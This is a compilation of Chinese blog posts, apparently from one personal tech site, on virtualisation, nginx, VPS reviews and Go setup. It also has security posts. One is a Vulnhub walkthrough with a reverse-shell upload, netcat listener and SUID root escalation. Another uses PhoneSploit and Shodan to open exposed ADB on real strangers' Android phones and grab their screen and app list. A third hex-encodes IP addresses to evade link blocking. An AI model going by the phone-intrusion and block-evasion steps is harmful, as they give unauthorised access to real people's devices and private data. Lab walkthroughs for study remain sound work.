云计算与KVM实践运用2 上一篇降到硬件虚拟化和软件虚拟化，那么，何为硬件虚拟化何为软件虚拟化呢1.软件虚拟化技术顾名思义，这是通过相关软件来模拟直接实现VMM层，纯软件的还原重定向客户机内的系统指令。早些时候的硬件系统并不支持虚拟化辅助，仅仅只能通过软件对机器码的直接翻译来对目标客户机仿真。那么，既然每一条操作指令都需要软件重定向给物理硬件，可想而知，虚拟化性能较差。而且软件代码复杂度显著增长。不过可以随意模拟平台。2.硬件虚拟化技术硬件本身具有辅助能力，能支持客户机指令独立执行，而不完全依赖VMM截取后重定向。大多数情况下，客户机系统与原生系统大同小异。从2005年起，I家在自家U中加人了硬件虚拟化的支持，简称Intel VT 后期所有的Intel CPU中都可以看见有VT的身影且每一代都有改进。既然有软/硬虚拟化，那也有全/半虚拟化了1.半虚拟化什么是最理想的虚拟化？1.让客户机不认为自身运行在虚拟化环境中2.不需要vmm层介入。抛开第一点，配合修改VMM层，这就是半虚拟化PV 在一方面提升了性能，也简化了VMM的难度。且不过于依赖硬件虚拟化技术的支持，跨平台相对友好。经典的如Virtio 需要双端驱动。2.全虚拟化与半虚拟化相反而为之，它则坚持第一点，客户机完全不需要修改。所有指令操作由VMM在系统和硬件之间处理，模拟出完整的类似与物理平台的平台，全虚拟化FV由于达成第一个目标，大大增加了VMM的复杂性。其实自从2005年硬件虚拟化技术开始发展之前，FV被PF完败，，但在兴起之后，情况彻底改变，VT-x VT-d的出现，代表着硬件虚拟化技术的兴起。由硬件辅助的FV开始全面超过PV，但半虚拟化也并非停滞不前。以Virtio为代表的半虚拟化一直在发展，虽性能略低于全虚拟化，但其得益于较低的平台依赖率，依旧收到广泛的欢迎。从框架上看，虚拟化层的位置又可风为Type1 Type2两种虚拟化Type1虚拟化，这类虚拟化层直接运行于硬件之上，没有宿主机系统的概念，而是直接分配控制硬件资源。如Xen 、VM ESXType2虚拟化，这类虚拟化层运行于某一宿主机操作上，如VMwareWorkstation系列，KVM。这类虚拟化层表现为操作系统的一个应用程序，受宿主机系统的调度和管理。通常被抽象为进程。

云计算与KVM实践运用1 什么是云计算从2006年，亚马逊Amazon发布了所谓的“弹性计算云”后，各大互联网厂商随即也相继推出了自家的云计算服务，众多云计算平台也如雨后春笋一样相继出现。如Google Computer Engine、阿里云、Openstack等等。。。。从全球来看，云计算市场这些年蓬勃发展让人侧目。云服务的几种类型作为推动IT转业务的重大变革。着眼于运营效率，快速响应等。IT即服务讲提供业务所需的一切，而不散失对系统的可控制性的同时，保持灵活性和敏捷性根据服务层次之间的差距，可以分为IaaS（基础架构即服务）、PaaS（平台即服务）、SaaS（软件即服务）服务随之抽象，用户可控制范围也随之减小。SaaS 软件即服务服务商直接使用部署好的软件系统为用户服务，用户完全不需要维护软件本身，只需使用服务即可。用户为服务付费。如常见的各种社交软件，云储存软件。PaaS 平台即服务服务提供商为相对应的客户提供开发，运维应用的一个环境。用户仅需维护自身的应用程序，并提供下一级服务，用户为运行环境付费。如云虚拟主机，云函数，Google App Engine之类。IaaS 基础架构即服务作为拥有最大的自主权的服务方式，用户可以随意操作操作系统，虚拟网络，虚拟硬件等。用户为一个主机环境付费。如阿里云，腾讯云等云服务器云数据库产品。那么无论是那种的服务方式服务模型，都离不开虚拟化（Virtualization）技术的基础什么是虚拟化技术虚拟化这东西好像离我们很远又离我们很近维基百科上这么定义的:“在计算机领域，虚拟化指创建某事物的虚拟版本，包括虚拟的计算机硬件平台、 储存设备、以及计算机网络资源”不难看出 这是一种资源管理技术可以将计算机物理资源分割独立出来重新组合，以达到最大的利用使用率。广义上看，硬盘的逻辑分区，LVM都算的上虚拟化。通常地，一个物理主机，只能在物理设备上运行一个操作系统以及依赖的运行环境和应用。而在加入虚拟化技术后，硬件被抽象出来，分割成了多个逻辑上的主机，同样也可以在上运行操作系统与应用程序，称之为虚拟机。VMM（虚拟机监控器，Hypervisor）是为了虚拟化引入之中的一个软件层，它掌控所有物理服务资源，并向虚拟机呈现数份逻辑资源，将物理资源访问重定向，让虚拟机以为在使用物理资源。真实的物理机称之为宿主机，虚拟机称之为客户机。一样的，虚拟化分为软件虚拟化和硬件虚拟化

Nginx禁止ip方式访问80、443端口 很多时候，在部署CDN的Https回源的时候，令人烦躁的Shodan引擎会让世界知道你的源站地址，带来不少麻烦比如惨烈的本站，在云锁防恶意解析功能不知道跑哪去以后，变成了这样源站地址直接暴露，这样做cdn防御还有什么用，，，根据证书查询到源服务器。。。。于是就寻思着在NGINX上手动配置一个默认站点，NGINX的默认站点寻找顺序是按照配置文件顺序排列的，在找不到可用server_name的时候，自动返回第一个站点。于是乎，我们需要在server标签最前面配置一个默认server标签来屏蔽大部分错误的请求。不过首先，我们肯定不会特意去买了个证书去配置443的默认站点吧。那就先使用OpenSSL自签发一份NGINX可用的证书一、签发证书1.生成私钥文件：openssl genrsa -des3 -out server.key 2048Ps：会提示需要给证书加密码2.去除口令：mv server.key server.key.backopenssl rsa -in server.key.back -out server.keyPs：会提示询问证书的密码3.创建请求证书：openssl req -new -key server.key -out server.csrPS：会提示输入一些信息，可以乱填或一路回车4.生成证书文件：openssl x509 -req -days 36500 -in server.csr -signkey server.key -out server.crt这样我们就得到了这样四个文件二、配置NGINX1.上传我们的server.crt server.key文件到我们NGINX所在的服务器下2.修改配置文件，在所有server的最前面添加server { listen 80 default_server; listen 443 default_server; server_name _; ssl on; ssl_certificate /www/server.crt;//证书上传地址 ssl_certificate_key /www/server.key; ssl_prefer_server_ciphers on; ssl_session_cache shared:SSL:10m; ssl_session_timeout 10m; ssl_ciphers ECDHE-RSA-AES128-GCM-SHA256:ECDHE:ECDH:AES:HIGH:!NULL:!aNULL:!MD5:!ADH:!RC4; ssl_protocols TLSv1 TLSv1.1 TLSv1.2; return 403;//返回403错误，可以自定义页面或其他错误码 }PS：代码放置需求，在虚拟主机配置文件前或主站点前eg.(宝塔)三、结束然后咋办？还要说？当然是保存重启了或者重载拉：—）如果返回403的话，正常就是这样了这样一来，可以有效阻止绝大部分的针对主机和域名的扫描器，保障服务器安全

Dell 717W热拔插电源强行启动 早些时候手上的R610刀锋机器下架了，就闲置在家里，拆了个717W的热拔插下来。大概这样分量挺足的，输出功率大，可惜就是没风扇。闲着也是闲着，看了看接口，寻思着能不能改个开关电源出来，让它强制启动。然而，以前24pin的电源只需要短接青（绿）黑两个接口就能强制启动了咋办？查了一下万能的百度，查出这样一张针脚表上面也说的很明白，将两个3.3V下拉GND即可启动反正就这三短接即可，也没去测是否直接相邻两个+3.3v和GND用跳线帽短接是否可行。最后就这鸟样、、、主输出大概这样、、、有能力的可以增加散热风扇，不然在强制启动下，哪怕没有负载，发热量也有点惊人

Linux中ping不通外网？ 在linux中ping www.baidu.com 无法ping通，出现：ping: www.baidu.com: Name or service not known 的错误，ping IP却可以通的， 一般是linux里的DNS没配置好。出现问题如图：解决方法1：在linux配置好相应的网关地址就行。方法：修改/etc/resolv.conf 文件，修改正确nameserver增加DNS服务器地址vi /etc/resolv.conf增加如下内容:nameserver 114.114.114.114 (电信的DNS)nameserver 8.8.8.8（googel的DNS）就可以实现ping通外网域名了解决方法2：在linux配置好相应的网卡设置就行vi /etc/sysconfig/network-scripts/ifcfg-eth*有一些VPS厂商的默认网关设置存在异常，需要手动配置正确的网关，否则无法联网

宝塔7.4.2 phpMyadmin未授权登录漏洞 宝塔昨天给每位注册用户基本上都发了这样一条消息经过询问一些大佬，得知是phpmyadmin登录的一个问题具体如下，在访问 IP:888/pma/ 的时候，不需要验证mysql账号密码即可以登录phpmyadmin如这个服务器这个服务器已经修复了这个服务器可以看到，不管是apache还是NGINX统统遭殃可以正常查询所有信息甚至是某政府网站。。。。也遭殃了漏洞修复@@@升级脚本@@@

Vulnhub靶场之Photographer: 1 废话不多说。下载安装先。启动kali虚拟机继续arp-scan -l查询目标ip目标：192.168.163.130，使用浏览器访问验证是目标地址使用nmap -sS -A 192.168.163.130查询相关的端口信息开放端口：80，139，445，8000刚刚80端口这边我们已经访问过了，是纯静态的内容，逐一访问，发现8000端口存在一个CMS系统是一个koken的cms，查询源码发现是0.22.24版本使用nikto扫描工具扫描目录nikto -h http://192.168.163.130:8000/可能存在admin目录，我们访问一下试试看页面设计的还不错。。。登录需要邮箱。我们目前没有，查阅exp库发现koken版本0.22.24的上传漏洞不过我没法登录，咋上传啊，首页也没有上传点呐于是乎，这个漏洞只能后期用刚刚我们发现存在445 139端口，具有smb的特征，那么，文件系统是否有值得我们搜索的东西呢使用enum4linux探索445端口 enum4linux 192.168.163.130没有账号密码，我们使用空密码连接挂载到我们本地目录下去看到有两个文件，第一个似乎是什么邮件的文件，我们cat一下那是密码吗？是邮箱号码？agi@photographer.com 或者daisa@photographer.com 密码： babygirl都试试看登录成功这样一来，刚刚的上传漏洞就能搞他了使用Kali自带的php反弹脚本来进行利用cp /usr/share/webshells/php/php-reverse-shell.php ~/yyssdd.php.jpg改一下监听端口七七八八。接下来上传，使用burp修改后缀名访问我们刚刚上传的另外在kali这边设置好监听nc -lvnp 1234监听好后开始访问，获取到反弹shell接下来python3 -c 'import pty;pty.spawn("/bin/bash")' 获取到交互式shell接下来查询关键的具有suid访问权限的程序find / -perm -u=s -type f 2>/dev/null发现有一个php7.2的东东具有权限，我们利用php7.2获取到root权限/usr/bin/php7.2 -r "pcntl_exec('/bin/sh', ['-p']);"使用php7.2的exec调起sh执行获取到root最高权似乎是旗子，搞定

ShockHosting 1H2G HDD 9.99$VPS测评 给三个好评，一个给大硬盘，一个给线路，一个给性能这款是本站原配置 速度非常快，大硬盘和3.5GHZ的CPU真的很吸引人（CPU默频3.5GHZ+，动态加速4.5GHZ）自带20G硬防官方分SSD和HDD款，但是在实际测试中，SSD和HDD款除了4K性能有区别外，连续读写速度基本持平，还有半价优惠下面看看测速开始bbrplus后，国内貌似电信有点抽风其他基本能接近半个带宽的速度另外也能看到io也是蛮高的。实测机器无超开的情况，基本上能跑满还是很赞的回程路由：大部分都是走的CN2-GT从上海回国去程：徐州联通徐州移动徐州电信基本上各家走各家的GT线路，但是效果还是不错商家的态度也很好，提交工单可以免费换机房，语气一定要好，不要丢了国人的脸。这家的机器不管是做储存还是开站都ojbk，高主频带来的体验很不错。对cloudflare的支持比较优秀，不管是移动香港回源还是电信美国回源，延迟都在2-10ms以内。

Cloudcone 2H4G 3T 6.5$VPS测评 最近cloudcone给我邮箱打了促销的邮件鉴于手头资金不是很足，看到这个2h4G心动了，但是还是有点怕线路问题造成缓慢，又或者是超开机器还不错CPU是E3 2.5GHZ的KVM架构，推测可能是1230可以自己额外购买ddos防御IP，每个IP仅需2美元/月，而且可以购买多个，ddos防御最高值为1Tbps，由全球最顶级的voxility提供，支持支付宝。测试IP：173.82.226.1 高防测试IP：173.82.152.1测速脚本：可以看出，磁盘io还是不错的，cpu性能在实际使用中可能略低，怀疑可能稍微超开了一点点。安装BBRPlus之后的速度不错，鉴于第一次做测评，脚本还出错了，哈哈下面看看路由去程江苏徐州电信走CN2 -GIA 过59.43.*.*去程江苏徐州移动GIA似乎去程江苏徐州联通GIA乍一看貌似都是各走各的线路，但是延迟还算阔以全网回程路由如果使用高防IP是禁止ICMP流量的。自测20G峰值流量无伤使用cloudflare的用户做好心理准备，CF移动香港直连到改机房的速度超过150MS，移动、教育网用户可能体验较差。可以考虑不加cdn。。。

十六进制网址探究 今天在某php群里看到了这样一个消息这奇怪的的域名把道锋我吓了一大跳，关键是，他能访问？？看这个后缀，意识到哪里不对劲，这绝对不是“正常”的域名访问的时候稍微研究了一下他的URL先是访问到了一个ip，然后才去向他的网站的。难道是ip有问题？我的咋就不能这么折腾呢？我这犟脾气上来了，看了看他的地址：http://0X6A.0X0341D84很明显的看到有0x这个字符串。。这是？0x是十六进制的特征，可以理解成是一个注释，让计算机系统知道你这串数据是十六进制编码。既然知道这是十六进制了，拿这串地址的真实意思是什么呢？脑子抽筋的我，先是选择十六进制转字符来转换。结果。。。毫不意外，直接乱码警告。。。死脑筋的我一时间没转过弯来。直到我第二次访问火狐浏览器给我跳这段下拉。0x6a下方的IP虽然是计数到255，但是本身是十进制啊。难不成要十六进制转十进制？果然呢。。。。xxx.xxx.xxx.xxx都找到了一一对应的数据，那就很明白了，这串地址的编码顺序应该是这样的设aaa.bbb.ccc.ddd则地址串应该是 http://0X (HEXaaa).0X (HEXbbb)(HEXccc)(HEXddd)这么说，我也能用这东西来防红咯来到服务器，先安装上NGINX。记录下地址47.101.190.190根据换算HEX47=2f HEX101=65 HEX190=be 整合成地址：http://0X2f.0X065BEBE/完美，再设置一下NGINX目录302重定向就实现防红了这位老哥真的是骚气啊。类似的操作还比如八进制只不过八进制模式貌似没法完整转换成纯八进制编码串（可能是我打开方式不对）

搭建Go语言开发环境 Golang是啥？Go（又称 Golang）是 Google 的 Robert Griesemer，Rob Pike 及 Ken Thompson 开发的一种静态强类型、编译型语言。Go 语言语法与 C 相近，但功能上有：内存安全，GC（垃圾回收），结构形态及 CSP-style 并发计算。一、安装1.下载推官网下载：https://golang.org/dl/或者使用镜像站点（推荐，速度较快）：https://golang.google.cn/dl/这里介绍的是Window开发环境（笔者懒得用Linux开发了（反正可以跨平台交叉编译））我是X64 Windows平台，，，一路next，再改一下路径就好。安装完成后，进入终端 用go version验证是否安装成功2.配置GOPATH类似的，和安装Java的环境类似，需要我们配置环境变量GOPATH路径最好只设置一个，所有的项目代码都放到GOPATH的src目录下。搞定，这样一来，在进行Go开发的时候，我们的代码总是会保存在$GOPATH/src目录下。在工程经过go build、go install或go get等指令后，会将下载的第三方包源代码文件放在$GOPATH/src目录下， 产生的二进制可执行文件放在 $GOPATH/bin目录下，生成的中间缓存文件会被保存在 $GOPATH/pkg 下。ps：下一篇，在IDE中开发编辑GO项目

使用Shodan扫描暴露的Adb控制全球在线的Andriod设备 这个项目是个好东西，但是fork有点惨淡。即便如此依然不影响它的能力，名称为PhoneSploit。支持Windows和Linux Windows的操作有点麻烦（不想折腾），因此本文以kali为主准备工作：PhoneSploitshodankail下载所需要的工具，也就是我们的项目。PhoneSploitLinux系统：git clone https://github.com/Zucccs/PhoneSploitcd PhoneSploitpip install coloramapython2 main_linux.pyWindows系统：git clone https://github.com/Zucccs/PhoneSploitextract adb.rar to the phonesploit directorycd PhoneSploitpip install coloramapython2 main.pyPS：由于我的kali环境比较全，没出现什么异常如果显示没有pip 的话，根据系统另行安装#python2 sudo apt install python-pip #非centos sudo yum install python2-pip #Centos #python3 sudo apt install python3-pip #非centos sudo yum install python3-pip #Centos看到下面的界面就表示安装成功由于我是Xshell的连接，色彩可能不一样接下来打开Shodan引擎一定一定要登录，不然没法搜索我们的相关语句之后根据关键词搜索，android debug bridge product:”Android Debug Bridge”.之后你就会看到如下界面。接下来根据工具所给的操作选项进行操作选项输入3我们输入靶机ip连接成功看到选项里面有一个查看屏幕的功能，我这里违背一下道德进行测试下载下来了看起来似乎在玩什么游戏遇到了广告输入14还能看到对方安装了什么软件所有操作请遵守法律！